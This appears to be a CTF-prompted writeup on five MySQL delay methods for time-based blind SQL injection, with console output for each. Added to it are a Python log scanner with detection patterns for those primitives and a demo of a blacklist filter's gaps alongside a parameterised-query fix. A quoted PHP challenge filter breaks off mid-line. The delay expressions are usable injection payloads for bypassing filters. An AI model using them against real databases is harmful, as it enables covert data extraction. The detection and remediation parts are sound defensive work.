MySQL Time-Based Blind SQL Injection: Five Delay Methods


A PWNHUB blind-injection challenge filtered the usual sleep and benchmark functions, which prompted some thought about the delay methods available for time-based blind injection.

Delay functions

SLEEP

mysql> select sleep(5);
+----------+
| sleep(5) |
+----------+
|        0 |
+----------+
1 row in set (5.00 sec)

BENCHMARK

mysql> select benchmark(10000000,sha(1));
+----------------------------+
| benchmark(10000000,sha(1)) |
+----------------------------+
|                          0 |
+----------------------------+
1 row in set (2.79 sec)

Cartesian product (heavy query)

mysql> SELECT count(*) FROM information_schema.columns A, information_schema.columns B, information_schema.tables C;
+------------+
| count(*)   |
+------------+
| 2651020120 |
+------------+
1 row in set (1 min 51.05 sec)

GET_LOCK

The delay is precisely controllable, but the scenarios where it can be used are limited; two sessions are needed to test it.

SESSION A

mysql> select get_lock('test',1);
+--------------------+
| get_lock('test',1) |
+--------------------+
|                  1 |
+--------------------+
1 row in set (0.00 sec)

SESSION B

mysql> select get_lock('test',5);
+--------------------+
| get_lock('test',5) |
+--------------------+
|                  0 |
+--------------------+
1 row in set (5.00 sec)

RLIKE

Build a long string with rpad or repeat and match it against a computationally expensive pattern; the repeat count controls how long the delay lasts.

mysql> select rpad('a',4999999,'a') RLIKE concat(repeat('(a.*)+',30),'b');
+-------------------------------------------------------------+
| rpad('a',4999999,'a') RLIKE concat(repeat('(a.*)+',30),'b') |
+-------------------------------------------------------------+
|                                                           0 |
+-------------------------------------------------------------+
1 row in set (5.27 sec)
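All five delay methods above leave a recognisable footprint in the MySQL general log (or the slow query log), which is where a defender can look for them. The following is an added example, not part of the original writeup: a small Python scanner that parses general-log lines in the tab-separated format MySQL writes and flags statements that contain SLEEP, BENCHMARK, GET_LOCK, an RLIKE/REGEXP combined with REPEAT or RPAD, or two or more information_schema tables in one statement (the Cartesian-product heavy query). The log lines are constructed sample data that reuse the expressions from the writeup; the rule names (`sleep`, `benchmark`, `get_lock`, `rlike_repeat`, `heavy_join`) are my own.

```python
import re
from dataclasses import dataclass

# Constructed sample lines in MySQL general-log format (tab-separated:
# timestamp, thread id + command, argument). They are made-up entries that
# reuse the delay expressions from the writeup; they are not captured traffic.
SAMPLE_LOG = (
    "2024-01-01T10:00:01.000000Z\t   12 Query\tSELECT name FROM users WHERE id = 7\n"
    "2024-01-01T10:00:02.000000Z\t   12 Query\tSELECT name FROM users WHERE id = 7 AND sleep(5)\n"
    "2024-01-01T10:00:09.000000Z\t   13 Query\tSELECT name FROM users WHERE id = 7 AND benchmark(10000000,sha(1))\n"
    "2024-01-01T10:00:15.000000Z\t   14 Query\tSELECT count(*) FROM information_schema.columns A, information_schema.columns B, information_schema.tables C\n"
    "2024-01-01T10:00:20.000000Z\t   15 Query\tSELECT get_lock('test',5)\n"
    "2024-01-01T10:00:26.000000Z\t   16 Query\tSELECT rpad('a',4999999,'a') RLIKE concat(repeat('(a.*)+',30),'b')\n"
    "2024-01-01T10:00:30.000000Z\t   17 Query\tSELECT name FROM users WHERE name RLIKE '^al'\n"
    "2024-01-01T10:00:31.000000Z\t   17 Quit\t\n"
)

# timestamp <TAB> padded thread id, command <TAB> argument
LINE_RE = re.compile(r"^(?P<ts>\S+)\t\s*(?P<thread>\d+) (?P<cmd>\w+)\t(?P<arg>.*)$")


def _mentions_two_information_schema_tables(sql: str) -> bool:
    # Two or more information_schema tables in one statement: the cross join
    # used as a "heavy query" delay.
    return len(re.findall(r"\binformation_schema\.\w+", sql, re.I)) >= 2


def _rlike_with_repeat(sql: str) -> bool:
    # RLIKE/REGEXP together with repeat()/rpad(): a long subject or pattern
    # built to force heavy backtracking in the regex engine.
    return (re.search(r"\b(?:rlike|regexp)\b", sql, re.I) is not None
            and re.search(r"\b(?:repeat|rpad)\s*\(", sql, re.I) is not None)


# One rule per delay method described in the writeup; names are my own.
RULES = [
    ("sleep", lambda s: re.search(r"\bsleep\s*\(", s, re.I) is not None),
    ("benchmark", lambda s: re.search(r"\bbenchmark\s*\(", s, re.I) is not None),
    ("get_lock", lambda s: re.search(r"\bget_lock\s*\(", s, re.I) is not None),
    ("rlike_repeat", _rlike_with_repeat),
    ("heavy_join", _mentions_two_information_schema_tables),
]


@dataclass
class Finding:
    thread_id: int
    methods: list
    sql: str


def classify(sql: str) -> list:
    """Return the names of the delay methods that appear in one SQL statement."""
    return [name for name, pred in RULES if pred(sql)]


def scan(log_text: str) -> list:
    """Parse general-log lines and return a Finding for every Query statement
    that contains at least one delay primitive; other commands are skipped."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m.group("cmd") != "Query":
            continue
        methods = classify(m.group("arg"))
        if methods:
            findings.append(Finding(int(m.group("thread")), methods, m.group("arg")))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"thread {f.thread_id}: {', '.join(f.methods)} :: {f.sql}")
```

Plain `RLIKE` on its own is not flagged (the last Query line is a legitimate pattern match); only the combination with `repeat`/`rpad` is. In practice these rules are a triage aid: a hit on an application connection that never normally issues such functions is the signal, and pairing the hit with the slow-log `Query_time` confirms whether the delay actually occurred.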

PWNHUB - The Simplest PHP in the Universe - Writeup

require 'conn.php';
$id = $_GET['id'];
if(preg_match("/(sleep|benchmark|outf
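The challenge's filter blacklists function names, which is exactly why the GET_LOCK, RLIKE and Cartesian-product variants above still work: a blacklist only knows the primitives its author thought of. The following is an added example, not code from the challenge or the writeup. It models the visible part of that filter (only `sleep|benchmark` survives in the source; the rest of the pattern is truncated, so the two-term version is an assumption), shows which of the five delay expressions it lets through, and contrasts it with the fix that does not depend on function names at all: allow-list validation of the `id` parameter followed by a bound parameter. SQLite is used in memory as a stand-in for the MySQL backend so the example runs offline; the binding idea is the same as MySQL prepared statements via mysqli or PDO.

```python
import re
import sqlite3

# Blacklist modelled on the PHP filter quoted in the writeup. Only the
# "sleep|benchmark" part is visible in the source; the rest of that pattern
# is truncated, so this two-term version is an assumption.
BLACKLIST = re.compile(r"sleep|benchmark", re.I)

# The five delay expressions from the writeup, reused here as test strings.
DELAY_EXPRESSIONS = {
    "sleep": "sleep(5)",
    "benchmark": "benchmark(10000000,sha(1))",
    "cartesian": "count(*) FROM information_schema.columns A, information_schema.columns B",
    "get_lock": "get_lock('test',5)",
    "rlike": "rpad('a',4999999,'a') RLIKE concat(repeat('(a.*)+',30),'b')",
}


def blacklist_allows(value: str) -> bool:
    """True when the blacklist would pass the value through unchanged."""
    return BLACKLIST.search(value) is None


def blacklist_gaps() -> list:
    """Names of the writeup's delay methods that the blacklist does not catch."""
    return [name for name, expr in DELAY_EXPRESSIONS.items() if blacklist_allows(expr)]


def make_demo_db() -> sqlite3.Connection:
    # In-memory SQLite stands in for the MySQL backend (assumption: no server
    # available offline). The rows are constructed sample data.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", [(7, "alice"), (8, "bob")])
    return conn


def safe_lookup(conn: sqlite3.Connection, raw_id: str) -> list:
    """Allow-list validation plus parameter binding.

    The id must look like an integer before it is used at all, and it is then
    passed as a bound parameter, so the database never parses it as SQL,
    regardless of which function names a blacklist happens to know about."""
    if not raw_id.isdigit():
        raise ValueError("id must be a non-negative integer")
    return conn.execute("SELECT name FROM users WHERE id = ?", (int(raw_id),)).fetchall()


if __name__ == "__main__":
    print("blacklist misses:", blacklist_gaps())
    db = make_demo_db()
    print(safe_lookup(db, "7"))
    for expr in DELAY_EXPRESSIONS.values():
        try:
            safe_lookup(db, expr)
        except ValueError as e:
            print("rejected:", e)
```

The allow-list check and the bound parameter are two independent layers; either alone stops the five delay methods, because none of them can be expressed as a string of digits and none is interpreted once the value is bound rather than concatenated.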
